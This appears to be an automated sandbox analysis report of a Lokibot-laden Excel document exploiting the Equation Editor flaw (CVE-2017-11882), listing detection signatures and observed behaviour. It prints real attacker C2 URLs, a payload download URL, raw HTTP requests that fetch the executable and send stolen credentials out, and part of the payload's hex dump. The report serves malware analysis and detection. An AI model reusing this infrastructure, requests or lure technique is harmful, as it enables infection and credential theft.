Analysis Report MV FORTUNE TRADER.xlsx

Overview

General Information

Sample Name: MV FORTUNE TRADER.xlsx
Analysis ID: 353332
MD5: b9d2e20a706f5dccd80cbfca09685732
SHA1: b3d2b8eaa620398c83ff203c3c705d03dad55288
SHA256: 132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://becharnise.ir/fa13/fre.php"]}
Multi AV Scanner detection for domain / URL
Source: becharnise.ir Virustotal: Detection: 16% Perma Link
Source: http://kbfvzoboss.bid/alien/fre.php Virustotal: Detection: 14% Perma Link
Source: http://alphastand.win/alien/fre.php Virustotal: Detection: 9% Perma Link
Source: http://alphastand.trade/alien/fre.php Virustotal: Detection: 10% Perma Link
Source: http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403D74 FindFirstFileW, 4_2_00403D74

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.208.180.121:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.208.180.121:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: http://becharnise.ir/fa13/fre.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 16 Feb 2021 06:02:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 16 Feb 2021 01:44:33 GMTETag: "41c00-5bb6a3e863566"Accept-Ranges: bytesContent-Length: 269312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 7b ab 66 a4 1a c5 35 a4 1a c5 35 a4 1a c5 35 ba 48 50 35 b6 1a c5 35 ba 48 41 35 99 1a c5 35 ba 48 46 35 d7 1a c5 35 83 dc be 35 a1 1a c5 35 a4 1a c4 35 d4 1a c5 35 ba 48 4f 35 a5 1a c5 35 ba 48 57 35 a5 1a c5 35 ba 48 51 35 a5 1a c5 35 ba 48 54 35 a5 1a c5 35 52 69 63 68 a4 1a c5 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 41 b2 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 b2 c6 04 00 00 00 00 40 30 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 c8 04 00 04 00 00 6d 30 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 86 03 00 62 00 00 00 60 7d 03 00 3c 00 00 00 00 10 c8 04 18 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 ee 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 86 00 00 00 00 03 00 00 88 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 74 c4 04 00 90 03 00 00 28 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 76 00 00 00 10 c8 04 00 78 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View IP Address: 103.141.138.123 103.141.138.123
Source: Joe Sandbox View IP Address: 185.208.180.121 185.208.180.121
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: AMINIDCIR AMINIDCIR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
Source: global traffic HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ED4 recv, 4_2_00404ED4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /receiprt/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyrusschinetwomast.dns.army
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: unknown HTTP traffic detected: POST /fa13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: becharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4081BD40Content-Length: 176Connection: close
Source: vbc.exe String found in binary or memory: http://becharnise.ir/fa13/fre.php
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2375614676.0000000007200000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: 83553F27.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the , , yellow bar above 21 This document is 22 ? protected 3 Once you have e
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above 24 25 26 27 28 29 lh\ Auv i r g prL?'tya vu a og u43
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040549C 4_2_0040549C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004029D4 4_2_004029D4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222C24 4_2_00222C24
Source: C:\Users\Public\vbc.exe Code function: 4_2_002256EC 4_2_002256EC
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MV FORTUNE TRADER.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00405B6F appears 42 times
Searches the installation path of Mozilla Firefox
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Yara signature match
Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@4/14@3/3
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 4_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR138.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: MV FORTUNE TRADER.xlsx Static file information: File size 2551296 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: MV FORTUNE TRADER.xlsx Initial sample: OLE indicators vbamacros = False
Source: MV FORTUNE TRADER.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 4.2.vbc.exe.400000.1.unpack
Yara detected aPLib compressed binary
Source: Yara match File source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1276, type: MEMORY
Source: Yara match File source: 4.3.vbc.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.240000.0.raw.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222D10 push eax; ret 4_2_00222D24
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222D10 push eax; ret 4_2_00222D4C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525BD22 push es; ret 4_2_0525BD24
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525E027 push ebp; ret 4_2_0525E02A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525B463 push eax; ret 4_2_0525B47E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525EA1F push edi; retf 4_2_0525EA20
Source: C:\Users\Public\vbc.exe Code function: 4_2_0525EE79 push E83768D8h; retf 4_2_0525EE7E

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
